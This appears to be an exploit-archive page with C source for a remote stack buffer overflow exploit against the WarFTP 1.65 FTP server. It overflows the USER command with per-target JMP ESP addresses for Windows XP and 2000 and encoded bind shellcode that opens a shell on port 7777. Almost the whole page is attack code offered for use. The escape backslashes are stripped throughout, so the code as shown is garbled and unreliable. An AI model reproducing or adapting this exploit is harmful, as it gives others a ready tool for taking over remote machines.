[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
# Published : 2007-03-25
# Author : niXel
# Previous Title : Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)
# Next Title : Frontbase <= 4.2.7 Remote Buffer Overflow Exploit (windows)
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "x55x53x45x52x20"
#define ZERO 'x00'
#define NOP 'x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel - SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: Und3rground2002@hotmail.com #####
##### #####
#############################################################################
CAUTION: USER command vulnerable => no send x40 (@) char into shellcode (user@host)
no send x0A (n) char into shellcode
no send x0D (r) char into shellcode
FUNCTION sprintf => no send x00 (�) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "ntWarFTP Username Stack-Based Buffer-Overflow Vulnerabilityn");
fprintf(stdout, " ____________________________________________________________________nn");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* #################################################################################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP x90x90x90x90 SYSCODE rn #####
################################################################################# */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) = VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = 'x41';
/* - OPcodes from ntdll.dll -> JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "xE3x39xF4x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "x0Fx98xF8x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "xEDx1Ex95x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "xE3x39xF4x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "xCCx59xFAx77", LENJMPESP); break;
case 5: memcpy(jmpESP, "xEDx1Ex95x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "x8Bx94xF8x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "xABx67xF9x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "t[ ERROR ] Three parameter syntax errornt[ ERROR ] Example: 0xFFFFFFFFn"); err = 1; }
}
}
else { fprintf(stderr, "t[ ERROR ] Three parameter syntax errornt[ ERROR ] Example: 0xFFFFFFFFn"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++) *(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++) *(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "rn", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "t[ OK ] Exploit buffer send to %s:%dn", argv[1], PORT);
fprintf(stdout, "t[ OK ] If you have not chosen a correct operating system andnt service pack you can cause a D.O.Sn");
fprintf(stdout, "t[ OK ] Connect: telnet %s 7777n", argv[1]);
}
else fprintf(stderr, "t[ ERROR ] No sending all exploit buffern");
}
free(pbuffSend);
}
else fprintf(stderr, "t[ ERROR ] No allocate memoryn");
}
else fprintf(stderr, "t[ ERROR ] Not a vulnerable servern");
}
else fprintf(stderr, "t[ ERROR ] Connect to %s:%dn", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "t[ ERROR ] Create local socketn");
WSACleanup();
}
else fprintf(stderr, "t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]nn", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro Spanish SP1 (1)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro Spanish SP2 (2)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP0 (3)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP1 (4)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP2 (5)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP0 (10)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP1 (11)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP2 (12)n");
fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP3 (13)n");
fprintf(stderr, "ttt[ - ] Custom Service Pack - JMP %%ESP (14)nn");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFFn", argv[0]);
}
fprintf(stdout, " ___________________________________________________________________nn");
return 0;
}
// www.Syue.com [2007-03-25]